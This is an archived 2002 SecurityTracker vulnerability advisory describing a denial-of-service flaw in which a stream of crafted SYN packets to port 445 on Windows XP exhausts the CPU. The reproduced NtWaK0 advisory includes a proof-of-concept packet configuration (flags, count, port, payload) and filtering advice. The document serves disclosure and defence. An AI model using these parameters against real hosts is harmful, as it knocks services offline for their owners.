SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   OS (Microsoft)  >   Windows TCP/IP Stack Vendors:   Microsoft
Windows XP Networking Port May Allow Remote Users to Deny Service By Sending a Stream of TCP SYN Packets
SecurityTracker Alert ID:  1003589
SecurityTracker URL:  http://securitytracker.com/id/1003589
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 19 2002
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A denial of service vulnerability was reported in Windows XP. A remote user can cause denial of service conditions on the server.

A remote user can reportedly send a specially crafted packet with the TCP SYN flag set to the Windows XP networking port 445 to cause the server to consume all available CPU resources. It is reported that this was tested with 3000 packets sent at an upload speed of 20K [presumably 20 KBytes per second]. This apparently caused the server to consume all CPU resources within 20 seconds after the initiation of the stream, preventing other tasks from functioning until the packet stream concluded.

It is reported that this port is enabled by default.

Impact:   A remote user can cause a denial of service condition.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (XP)

Message History:   None.


 Source Message Contents

Subject:  Windows XP Remote DOS attacks with SYN Flag. Make CPU 100 %


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                           .---------------.
                          / NtWaK0 Advisory \
+-----------------------------------------------------------------------.
                                                                        :
Affected         : Windows XP default install with TCP 445 open         :
Type             : Remote DOS attacks with SYN Flag. Make CPU 100 %     :
Date             : 15-02-2002                                           :
Author           : NtWaK0 @ www.SafeHack.com                            :
+-----------------------------------------------------------------------.
                                                                        :
+----------------.
 Remote/Local DOS \
+------------------`----------------------------------------------------.
                                                                        :
+-----------.                                                           :
 Disclaimer  \                                                          :
+-------------`---------------------------------------------------------.
The information in this advisory is believed to be true based on        :
experiments though it may be false. The opinions expressed in this      :
advisory and program are my own and NOT of any company.                 :
In Fact I do not work for no one at the present time.                   :
                                                                        :
This material is presented for informational and entertainment purposes :
only, and to satisfy the curious. Any activities described in this file :
which involve vandalism, theft, or any other illegal activities are     :
recounted from third-party conversations. I do not condone or encourage :
vandalism or theft. I do not accept any liability for anything anyone   :
does with this information. So, don't shoot the messenger.              :
Remember: Use a computer in ways that ensure respect for your fellows.  :
                                                                        :
+-------.                                                               :
 T.O.C.  \                                                              :
+---------`-------------------------------------------------------------.
                                                                        :
                                                                        :
   [  Brief History . . . . . . . . . . . . . . . . . . . . . .line 45 ]:
                                                                        :
   [  The Problem . . . . . . . . . . . . . . . . . . . . . . .line 58 ]:
                                                                        :
   [  The Solution . . . . . . . . . . . . . . . . . . . . . .line 130 ]:
                                                                        :
+-------------.                                                         :
 Brief History \                                                        :
+---------------`-------------------------------------------------------.
TCP/UPD port 445 is open by default on a Fresh installed XP box.        :
The attack is seriouse since it work remotly and can make the CPU 100 % :
in less then 20 Second.                                                 :
To learn more about Windows XP please visit:                            :
http://www.microsoft.com                                                :
                                                                        :
YES YOUR HAVE GUESSED IT ENGLISH IS NOT MY MOTHER LANGUAGE -:)          :
+---------------------------+                                           :
 >>> Test OS Applications <<<                                           :
+---------------------------+                                           :
Tested on Windows XP                                                    :
Default Install with default ports                                      :
                                                                        :
+-----------.                                                           :
 The Problem \                                                          :
+-------------`---------------------------------------------------------.
If an attacker target your Windows XP port 445 TCP with some special    :
crafted packed [SYN Flag Set] they can cause 100 CPU % utilisation in   :
less then 20 Second. The speed while sending the packet was 20 K upload :
sometime less then 18 K [Based on DU-Meter]                             :
                                                                        :
I have tried some other default port with a similar attack but the CPU  :
utilistation was normal 9 % or 5 %.                                     :
                                                                        :
The target machine is a windows XP with 240 RAM.                        :
                                                                        :
I tried to send packets with other then SYN flag nothing happend. CPU OK:
When I sent about 3000 packets NOT IN ONE SHOT... I was sending the     :
packets one after the other, I noticed that CPU utilisation jumped 100% :
                                                                        :
I could not do any TASK on the XP machine till I stoped sending packets.:
                                                                        :
I can see this as a seriouse problem if you are using windows XP default:
                                                                        :
Imagine someone is attacking your Windows XP from 1000 zombies. I am    :
not sure if your Windows XP wont Crash.                                 :
                                                                        :
Like I said I send couples of packets and the CPU jumped in less then   :
20 Sec to 100 %. Soon I am going to do more tests to see what will      :
happen if I send the same packets but for one hour time or more.        :
                                                                        :
                                                                        :
+-----------------------------------------+                             :
>>> Proof-Of-Concept-Packet-Information <<<                             :
+-----------------------------------------+                             :
[IP]                                                                    :
SourceAddress=                                                          :
SourcePort=1                                                            :
DestinationAddress=                                                     :
DestinationPort=445                                                     :
HeaderSize=20                                                           :
SpecifyHeaderSize=0                                                     :
Identification=0                                                        :
SpecifyIdentification=0                                                 :
Checksum=0                                                              :
SpecifyChecksum=0                                                       :
TypeService=4                                                           :
FragmentationType=2                                                     :
DataSize=32                                                             :
Offset=0                                                                :
TTL=1                                                                   :
                                                                        :
[Commands]                                                              :
NbPackets=3000                                                          :
PacketType=0                                                            :
                                                                        :
[TCP]                                                                   :
fURG=0                                                                  :
fACK=0                                                                  :
fPUSH=0                                                                 :
fRESET=0                                                                :
fSYN=1                                                                  :
fFIN=0                                                                  :
Acknowledge=0                                                           :
Sequence=0                                                              :
Window=0                                                                :
Offset=0                                                                :
Urgent=0                                                                :
Checksum=0                                                              :
SpecifyTCPChecksum=0                                                    :
Data=xffxffxffxffxffxffxffxffxffffx00                                   :
                                                                        :
........................................................................:
........................................................................:
                                                                        :
+------------.                                                          :
 The Solution \                                                         :
+--------------`--------------------------------------------------------.
Vendor should be informed...I guess Microsoft read Securityfocus too    :
Filter 445 and other UNUSED ports. Stop Unused Services                 :
+-----------------------------------------------------------------------.

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

iQA/AwUBPG00kPPoW9fFNsN8EQIMcwCg4aNhkGYMIEDs4u+l3MCo5BMZKrcAn17B
fd1j/WRgYSqj/B4AkiohkXNz
=jwkR
-----END PGP SIGNATURE-----

________________________________________________________________________
The only secure computer is one that's unplugged, locked in a safe,
and buried 20 feet under the ground in a secret location... and i'm
not even too sure about that one"--Dennis Huges, FBI.
____________________________________________________________.___________
Live Well Do Good  www.SafeHack.com                         |
Je Pense, Donc Je Suis                                    \(|)/
I know I ain't perfect, but i'm 99 point 9 percent :)    --(")--
________________________________________________________________________
Connect yourself to the main computer and let me take you to a
cybernetic ride. Are you connected to the right cybernet? If you are,
finally you are connected to my brain.
________________________________________________________________________
-=- Use a computer in a ways that ensure respect for your fellow     -=-

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC